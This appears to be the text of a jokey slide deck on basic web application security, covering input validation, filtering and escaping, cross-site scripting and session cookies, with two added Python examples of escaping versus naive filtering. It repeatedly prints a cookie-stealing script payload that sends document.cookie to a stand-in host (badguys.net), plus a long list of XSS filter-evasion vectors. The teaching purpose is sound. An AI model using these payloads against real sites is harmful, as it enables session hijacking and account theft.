Basic Web Application Security
User Input
Kick Your Arse
Three Ways (All Awesome)
Validation
Passive (No touchy-touchy)
This is a Number.
2
This is not a Number.
a
This is really not a Number.
<script>alert('loldongs')</script>
Filtering
Destructive (One-Way Street)
Only letting the good stuff in.
or
Keeping out the bad stuff.
What's the diff? (Bro.)
Both can be error-prone...
What happens when you screw it up?
White-Listing: Usability Problems.
Black-Listing: Security Problems.
(Always a trade-off.)
Escaping
Transport: Point A → Point B
Data will be the same on both sides.
Different Media, Different Escaping
HTML
<b>Huh.</b>
<p><i><b>Huh.</b></i></p>
<b>Huh</b>
SQL
Sam O’Brien
INSERT INTO mah_peeps (name) VALUES ('Sam O\'Brien');
1, Sam O’Brien, 2010-09-02 18:30:00
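The three ways from these slides, run over the deck's own sample values, as an added example (not part of the original presentation): validation of "is this a number", filtering of a name, HTML escaping of `<b>Huh.</b>` with the round trip checked, and the Sam O'Brien insert done with a bound parameter so the database driver does the SQL escaping that the slide does by hand with a backslash. The table and column names mah_peeps and name come from the slide; the id column, SQLite, and the allowed-character set for the filter are my assumptions.

```python
# Added example, not from the slides: the three ways of handling user input,
# run over the deck's own sample values. Standard library only.
import html
import re
import sqlite3

NUMBER_RE = re.compile(r"[0-9]+")


def validate_number(value: str) -> bool:
    """Validation is passive: accept or reject the input, never change it."""
    return NUMBER_RE.fullmatch(value) is not None


def filter_name(value: str) -> str:
    """Filtering is destructive: anything outside the allowed set (an assumed
    letters-and-punctuation set) is gone for good, and what is left may be mush."""
    return re.sub(r"[^A-Za-z .'-]", "", value)


def escape_for_html(value: str) -> str:
    """Escaping is a transport encoding: the browser decodes it back to the same text."""
    return html.escape(value, quote=True)


def html_round_trips(value: str) -> bool:
    """Point A to Point B: the data is the same on both sides."""
    return html.unescape(escape_for_html(value)) == value


def store_and_fetch_name(name: str) -> str:
    """SQL escaping, but left to the driver: bind the value as a parameter
    instead of splicing a backslash-escaped string into the statement."""
    conn = sqlite3.connect(":memory:")  # SQLite in memory is an assumption
    conn.execute("CREATE TABLE mah_peeps (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO mah_peeps (name) VALUES (?)", (name,))
    (stored,) = conn.execute("SELECT name FROM mah_peeps WHERE id = 1").fetchone()
    conn.close()
    return stored


if __name__ == "__main__":
    for sample in ("2", "a", "<script>alert('loldongs')</script>"):
        print(repr(sample), "is a number:", validate_number(sample))
    print(filter_name("Sam O'Brien <b>!</b>"))  # Sam O'Brien bb  (markup mangled, not cleanly removed)
    print(escape_for_html("<b>Huh.</b>"))       # &lt;b&gt;Huh.&lt;/b&gt;
    print(html_round_trips("<b>Huh.</b>"))      # True
    print(store_and_fetch_name("Sam O'Brien"))  # Sam O'Brien, apostrophe intact
```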
XSS (Cross-Site Scripting)
(XTREME Site Scripting)
SS
Sticking Scripts Where They Don’t Belong.
You there, down the back. Stop sniggering.
<script>alert('HACKED BY LOLDONGS')</script>
Amateurs!
<script>alert(document.cookie)</script>
Hmm.
<script>document.write('<img
src="http://badguys.net/logthis.php?d='+document.cookie+'"
style="display:none;">');</script>
Oh shit.
Why is this uncool?
(Yeah! Why?)
<script>document.write('<img
src="http://badguys.net/logthis.php?d='+document.cookie+'"
style="display:none;">');</script>
Ooooh shit.
<script>document.write('<img
src="http://badguys.net/logthis.php?d='+document.cookie+'"
style="display:none;">');</script>
Oooooooooooh shit.
<script>document.write('<img
src="http://badguys.net/logthis.php?d='+document.cookie+'"
style="display:none;">');</script>
Oooooooooooooooooh shit.
Why is this really uncool?
(Because shut up.)
HTTP
Hyper-Text Thingy I-forgot-again
Stateless
No Idea Who You Are.
It can guess. (Badly.)
IP Address, Browser User-Agent
Sends a cookie with each request.
(A basket of goodies that the browser sends faithfully every request.)
The Server puts a unique ID in the basket.
PHPSESSID=123your456mum789
__utma=12948.23.4211414.5553
is_a_furry=1
Browser sends the ID every request.
PHPSESSID=123your456mum789
<script>document.write('<img
src="http://badguys.net/logthis.php?d='+document.cookie+'"
style="display:none;">');</script>
Look again.
THEY HAVE YOUR COOKIE.
Ooooooooooooooooooooooo-
Preventing Shenanigans
HTML Validation: Really Hard.
HTML Filtering: Still Really Hard. Use a library, e.g. HTML Purifier.
HTML Escaping: Dead Easy. Most languages have stuff to handle this, e.g. htmlentities(), cgi.escape(), CGI.escape().
How hard is filtering?
(It’s just <script>, right?)
THIS HARD.
<IMG SRC=javascript:alert('a')>
<img src=javascript:alert("a")>
<img """><script>alert('a')</script>">
<IMG
SRC=javascr
ipt:ale
14;
t('XSS')>
<IMG
SRC=javascr
ipt:aler
t('XSS')
>
<IMG SRC="jav ascript:alert('a');">
(Well, then.)
<IMG SRC="jav	asœript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<SCR\0IPT>alert('a')</SCR\0IPT>
<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>
<img onmouseover!#$%&=alert('a')>
<<SCRIPT>alert("a");//<</SCRIPT>
<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>
<SC\0RIPT SRC=http://foo/x.js?<B>
<script src=//foo/x.js>
<img src="javascript:alert('a')"
THIS HARD.
<iframe src=http://foo/x.html <
<body background="javascript:alert('a')">
<BODY ONLOAD=alert('a')>
<img dynsrc="javascript:alert('a')">
<img lowsrc="javascript:alert('a')">
<BGSOUND SRC=javascript:alert('a')>
<BR SIZE="&{alert('a')}">
<LAYER SRC="http://foo/x.html"></LAYER>
<link rel="stylesheet" href="javascript:alert('a');">
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>BODY{-moz-binding:url("http://foo/
x.xml#xss")}</STYLE>
(Well, then.)
<IMG SRC='vbscript:msgbox("a")'>
<img src="livescript:alert('a')">
žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding evasion)
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('a');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
THIS HARD.
<DIV STYLE="background-image: url(javascript:alert('a'))">
<DIV STYLE="background-image:\0075\0072\006C\
0028'\006a
\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003
a\0061
\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\002
9'\0029">
<DIV STYLE="background-image: url(javascript:alert('a'))">
<DIV STYLE="width: expression(alert('a'));">
<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("a"))'>
<STYLE TYPE="text/javascript">alert('a');</STYLE>
(Well, then.)
<STYLE>.x{background-image:url("javascript:alert('a')");}</STYLE><A CLASS=X></A>
<BASE HREF="javascript:alert('a');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://foo/x.html"></OBJECT>
<EMBED SRC="http://foo/xss.swf" AllowScriptAccess="always"></EMBED>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd....jwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
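To show how hard filtering is in practice, an added example (not part of the original deck) that runs a naive strip-the-script-tags filter and plain escaping over five of the vectors quoted on the slides above and counts how many still carry a raw `<` afterwards. The filter and the "can it still open an element" grading rule are my own assumptions; the vectors are the slides'.

```python
# Added example, not from the slides: a naive black-list filter ("it's just
# <script>, right?") next to plain escaping, graded against a few of the
# evasion vectors quoted on the preceding slides. Standard library only.
import html
import re

SCRIPT_TAG_RE = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def naive_filter(value: str) -> str:
    """Black-list filtering (assumed): strip <script> and </script> tags and hope."""
    return SCRIPT_TAG_RE.sub("", value)


def escape(value: str) -> str:
    """Escaping: every '<' becomes '&lt;' (quotes are encoded too),
    so the output can never open an element, whatever it says."""
    return html.escape(value, quote=True)


# Vectors copied from the deck (the slides show many more).
VECTORS = [
    "<script>alert('a')</script>",          # the one the filter was written for
    "<IMG SRC=javascript:alert('a')>",      # no script tag anywhere
    "<BODY ONLOAD=alert('a')>",             # event handler instead of a tag
    "<<SCRIPT>alert(\"a\");//<</SCRIPT>",   # an extra '<' survives the strip
    "<SCR\0IPT>alert('a')</SCR\0IPT>",      # NUL byte breaks the token match
]


def can_open_element(markup: str) -> bool:
    """The one property escaping guarantees: no raw '<' left in the output."""
    return "<" in markup


def still_open_after_filter(vectors):
    """Vectors the black-list lets through with a raw '<' intact."""
    return [v for v in vectors if can_open_element(naive_filter(v))]


def still_open_after_escape(vectors):
    """Vectors escaping lets through with a raw '<' intact (expected: none)."""
    return [v for v in vectors if can_open_element(escape(v))]


if __name__ == "__main__":
    for v in VECTORS:
        print(f"{v!r:45} filter-> {naive_filter(v)!r}")
    print("survive the filter:", len(still_open_after_filter(VECTORS)), "of", len(VECTORS))  # 4 of 5
    print("survive escaping:  ", len(still_open_after_escape(VECTORS)), "of", len(VECTORS))  # 0 of 5
```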
And one last thing.
(Groan.)
Remember <script>alert()</script>?
(Yes, I do. Shut up.)
alert() can be ANY JAVASCRIPT.
(Yes, and...?)
Do you have any forms on your page?
(Yes.)
Do you have any javascript functions your site uses to do anything useful?
(... Yes.)
Does your site make any AJAX calls to do anything useful?
(... Oh.)
That injected code can trigger forms, run javascript functions, or make AJAX calls.
(... Oooooh.)
Send someone to a link that looks like:
http://my.site/?user=<script>doStuff();</script>
(... Oooooooooh.)
Or store something that will output this on someone's profile page:
<script>doStuff();</script>
(... Oooooooooooooooh.)
... And you’re hosed.
(Shit.)
The Human Element
Touchy-Feely Commie Bullshit.